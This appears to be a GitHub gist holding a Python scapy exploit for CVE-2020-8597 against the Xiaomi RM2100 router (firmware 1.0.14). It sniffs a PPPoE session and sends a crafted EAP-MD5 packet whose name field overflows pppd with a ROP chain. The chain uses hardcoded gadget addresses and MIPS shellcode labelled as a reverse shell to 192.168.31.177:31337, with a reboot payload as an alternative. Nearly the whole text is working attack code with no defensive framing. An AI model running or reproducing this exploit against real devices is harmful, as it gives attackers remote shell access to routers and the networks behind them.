Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Xiaomi RM2100 1.0.14 vs. CVE-2020-8597
from scapy.all import *
from socket import *
interface = "enp0s31f6"
def mysend(pay,interface = interface):
sendp(pay, iface = interface)
def packet_callback(packet):
global sessionid, src, dst
sessionid = int(packet['PPP over Ethernet'].sessionid)
dst = (packet['Ethernet'].dst)
src = (packet['Ethernet'].src)
# In case we pick up Router -> PPPoE server packet
if src.startswith("88:c3:97") :
src,dst = dst,src
print("sessionid:" + str(sessionid))
print("src:" + src)
print("dst:" + dst)
def eap_response_md5():
md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"
# Reverse shell, connect to 192.168.31.177:31337
stg3_SC = b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"
reboot_shell = b"\x23\x01\x06\x3c"
reboot_shell += b"\x67\x45\xc6\x34"
reboot_shell += b"\x12\x28\x05\x3c"
reboot_shell += b"\x69\x19\xa5\x24"
reboot_shell += b"\xe1\xfe\x04\x3c"
reboot_shell += b"\xad\xde\x84\x34"
reboot_shell += b"\xf8\x0f\x02\x24"
reboot_shell += b"\x0c\x01\x01\x01"
#Debug sleep
#s0 = b"\x00\x00\x00\x00"
#s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
#s2 = b"\x03\x00\x00\x00"
#s3 = b"\x01\x00\x00\x00"
#s4 = b"\x0c\x93\x40\x00"
#s5 = b"\x00\x00\x00\x00"
#Debug reboot
#s0 = b"\x00\x00\x00\x00"
#s1 = b"\xB0\x9B\xEB\x77" # uclibc reboot(s2) base + 0xfbb0 = 77EB9BB0
#s2 = b"\x67\x45\x23\x01"
#s3 = b"\x01\x00\x00\x00"
#s4 = b"\x0c\x93\x40\x00"
#s5 = b"\x00\x00\x00\x00"
#ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9
s0 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
s1 = b"\x01\x00\x00\x00"
s2 = b"\x41\x41\x41\x41"
s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp 00000000 00:00 0 [stack]
s4 = b"\x88\xe1\x40\x00" # pppd.txt:0x0040e188
s5 = b"\x00\x00\x00\x00"
ra = b"\x0C\x81\xF1\x77" # libuClibc.txt:0x0006e10c 77F1810C
rop_chain = (b'A' * 0x184)
rop_chain += s0
rop_chain += s1
rop_chain += s2
rop_chain += s3
rop_chain += s4
rop_chain += s5
rop_chain += ra
# Nop slide
rop_chain += (b'\x00' * 0x100)
# Small reboot shellcode for testing
#rop_chain += reboot_shell
rop_chain += stg3_SC
# Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop
rop_chain += (b'\x00' * 0x4)
pay = Ether(dst=dst,src=src,type=0x8864)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain)
mysend(pay)
if __name__ == '__main__':
sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1)
eap_response_md5()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment